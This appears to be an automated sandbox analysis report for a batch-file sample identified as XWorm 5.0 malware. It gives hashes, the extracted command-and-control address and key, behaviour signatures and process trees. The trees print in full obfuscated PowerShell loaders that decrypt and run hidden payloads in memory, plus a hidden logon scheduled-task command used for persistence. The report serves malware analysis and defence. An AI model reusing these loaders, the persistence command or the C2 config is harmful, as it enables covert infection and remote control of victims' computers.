Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
111s -
max time network
110s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
15/06/2024, 18:59
Static task
static1
Behavioral task
behavioral1
Sample
binded.bat
Resource
win10-20240404-en
General
-
Target
binded.bat
-
Size
1.1MB
-
MD5
4fcc4a79a40b5d4eda4116d6296dc607
-
SHA1
4f140172d00f5a40eb9c0f07b166cfc2111f0d71
-
SHA256
888b6ce9498a1425df0701fdc73c99c255684ec192db6290e16bb4c82da8656e
-
SHA512
2614afb3e2f7f5501246d79c7871710d0048ebacc69e517766709fdcb56e858c27deb4ed0fe1eab46f8175033446fb2f720fb43ff161552986d31dd4a8e0ccc1
-
SSDEEP
24576:vVq7sFq6XgPKd2wM6RcN9vz4vO21SCKesDu8a1KZ/4hvXQ:vxlR6QBsxb/4C
Malware Config
Extracted
xworm
5.0
37.114.46.114:5555
ybJkzY88U2SuCjEV
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3560-399-0x000002586A1C0000-0x000002586A1CE000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3560 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 3560 powershell.exe 2688 powershell.exe 3744 powershell.exe 3028 powershell.exe 4920 powershell.exe 5068 powershell.exe 5048 powershell.exe 3832 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\$rundll_724_str svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4920 powershell.exe 4920 powershell.exe 4920 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5068 powershell.exe 5068 powershell.exe 5068 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 3832 powershell.exe 3832 powershell.exe 3832 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 3560 powershell.exe 2688 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe Token: 33 3832 powershell.exe Token: 34 3832 powershell.exe Token: 35 3832 powershell.exe Token: 36 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe Token: 33 3832 powershell.exe Token: 34 3832 powershell.exe Token: 35 3832 powershell.exe Token: 36 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 4640 1468 cmd.exe 74 PID 1468 wrote to memory of 4640 1468 cmd.exe 74 PID 1468 wrote to memory of 4920 1468 cmd.exe 75 PID 1468 wrote to memory of 4920 1468 cmd.exe 75 PID 4920 wrote to memory of 5060 4920 powershell.exe 77 PID 4920 wrote to memory of 5060 4920 powershell.exe 77 PID 5060 wrote to memory of 3236 5060 powershell.exe 79 PID 5060 wrote to memory of 3236 5060 powershell.exe 79 PID 3236 wrote to memory of 3128 3236 cmd.exe 80 PID 3236 wrote to memory of 3128 3236 cmd.exe 80 PID 3236 wrote to memory of 5068 3236 cmd.exe 81 PID 3236 wrote to memory of 5068 3236 cmd.exe 81 PID 168 wrote to memory of 3840 168 cmd.exe 86 PID 168 wrote to memory of 3840 168 cmd.exe 86 PID 168 wrote to memory of 5048 168 cmd.exe 87 PID 168 wrote to memory of 5048 168 cmd.exe 87 PID 5048 wrote to memory of 3832 5048 powershell.exe 88 PID 5048 wrote to memory of 3832 5048 powershell.exe 88 PID 5048 wrote to memory of 4928 5048 powershell.exe 90 PID 5048 wrote to memory of 4928 5048 powershell.exe 90 PID 4928 wrote to memory of 756 4928 WScript.exe 91 PID 4928 wrote to memory of 756 4928 WScript.exe 91 PID 756 wrote to memory of 4964 756 cmd.exe 93 PID 756 wrote to memory of 4964 756 cmd.exe 93 PID 756 wrote to memory of 3560 756 cmd.exe 94 PID 756 wrote to memory of 3560 756 cmd.exe 94 PID 3560 wrote to memory of 3384 3560 powershell.exe 54 PID 3560 wrote to memory of 2556 3560 powershell.exe 84 PID 3560 wrote to memory of 2748 3560 powershell.exe 47 PID 3560 wrote to memory of 1368 3560 powershell.exe 25 PID 3560 wrote to memory of 4712 3560 powershell.exe 60 PID 3560 wrote to memory of 1360 3560 powershell.exe 24 PID 3560 wrote to memory of 1752 3560 powershell.exe 32 PID 3560 wrote to memory of 2732 3560 powershell.exe 46 PID 3560 wrote to memory of 1352 3560 powershell.exe 23 PID 3560 wrote to memory of 2520 3560 powershell.exe 43 PID 3560 wrote to memory of 2512 3560 powershell.exe 42 PID 3560 wrote to memory of 2704 3560 powershell.exe 45 PID 3560 wrote to memory of 732 3560 powershell.exe 8 PID 3560 wrote to memory of 4868 3560 powershell.exe 62 PID 3560 wrote to memory of 1560 3560 powershell.exe 28 PID 3560 wrote to memory of 1904 3560 powershell.exe 36 PID 3560 wrote to memory of 1508 3560 powershell.exe 27 PID 3560 wrote to memory of 916 3560 powershell.exe 13 PID 3560 wrote to memory of 1100 3560 powershell.exe 20 PID 3560 wrote to memory of 1684 3560 powershell.exe 31 PID 3560 wrote to memory of 1092 3560 powershell.exe 19 PID 3560 wrote to memory of 1876 3560 powershell.exe 38 PID 3560 wrote to memory of 1080 3560 powershell.exe 18 PID 3560 wrote to memory of 2252 3560 powershell.exe 40 PID 3560 wrote to memory of 868 3560 powershell.exe 12 PID 3560 wrote to memory of 1852 3560 powershell.exe 35 PID 3560 wrote to memory of 2832 3560 powershell.exe 50 PID 3560 wrote to memory of 3204 3560 powershell.exe 53 PID 3560 wrote to memory of 2808 3560 powershell.exe 49 PID 3560 wrote to memory of 1620 3560 powershell.exe 30 PID 3560 wrote to memory of 4180 3560 powershell.exe 65 PID 3560 wrote to memory of 3588 3560 powershell.exe 63 PID 3560 wrote to memory of 1216 3560 powershell.exe 22 PID 3560 wrote to memory of 1408 3560 powershell.exe 26 PID 3560 wrote to memory of 816 3560 powershell.exe 11 PID 3560 wrote to memory of 1208 3560 powershell.exe 21 PID 3560 wrote to memory of 2184 3560 powershell.exe 39 PID 3560 wrote to memory of 936 3560 powershell.exe 17
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵PID:816
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}2⤵PID:4236
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" "3⤵PID:1844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵PID:196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$rundll_724_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$svchost_724.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$svchost_724.vbs"5⤵PID:2372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$svchost_724.bat" "6⤵PID:5032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Roaming\$svchost_724.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:4128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
PID:3028
-
-
-
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k rpcss1⤵PID:868
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:916
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:936
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork1⤵PID:1092
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1100
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1208
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1360
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1508
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1560
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1588
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1684
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1784
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1876
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2252
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2504
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2512
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2520
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2704
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2732
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2748
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2808
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2832
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3204
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3384
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\binded.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ubDdfc++dGnZOierWx4nOy1eVZcVDN85yhJABtnz1EQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gCMQkn589+ljXLannfa+nQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RIlPD=New-Object System.IO.MemoryStream(,$param_var); $OGgVf=New-Object System.IO.MemoryStream; $eubOA=New-Object System.IO.Compression.GZipStream($RIlPD, [IO.Compression.CompressionMode]::Decompress); $eubOA.CopyTo($OGgVf); $eubOA.Dispose(); $RIlPD.Dispose(); $OGgVf.Dispose(); $OGgVf.ToArray();}function execute_function($param_var,$param2_var){ $QwKrI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WoDJg=$QwKrI.EntryPoint; $WoDJg.Invoke($null, $param2_var);}$JMcWp = 'C:\Users\Admin\AppData\Local\Temp\binded.bat';$host.UI.RawUI.WindowTitle = $JMcWp;$AmLgz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JMcWp).Split([Environment]::NewLine);foreach ($SNfpD in $AmLgz) { if ($SNfpD.StartsWith('pMkqFCQhZNmuDPfTbxXO')) { $BtghH=$SNfpD.Substring(20); break; }}$payloads_var=[string[]]$BtghH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\AppData\Local\dllhost.bat4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\dllhost.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z2xC2h+C2t+xhefZVNgrwhVd+6cW81hKA09gr+Vgl4k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJXvi7Nv9XV1R1jEsJpl9g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYNnG=New-Object System.IO.MemoryStream(,$param_var); $ddxMX=New-Object System.IO.MemoryStream; $tCHGY=New-Object System.IO.Compression.GZipStream($FYNnG, [IO.Compression.CompressionMode]::Decompress); $tCHGY.CopyTo($ddxMX); $tCHGY.Dispose(); $FYNnG.Dispose(); $ddxMX.Dispose(); $ddxMX.ToArray();}function execute_function($param_var,$param2_var){ $FpgFt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IsQVI=$FpgFt.EntryPoint; $IsQVI.Invoke($null, $param2_var);}$gzWXE = 'C:\Users\Admin\AppData\Local\dllhost.bat';$host.UI.RawUI.WindowTitle = $gzWXE;$jVKyS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gzWXE).Split([Environment]::NewLine);foreach ($MYFti in $jVKyS) { if ($MYFti.StartsWith('mDQBKkDMpSmzSJjqvWce')) { $zEoKi=$MYFti.Substring(20); break; }}$payloads_var=[string[]]$zEoKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:3128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4712
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3588
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:4180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\conhost.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Local\conhost.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:3840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
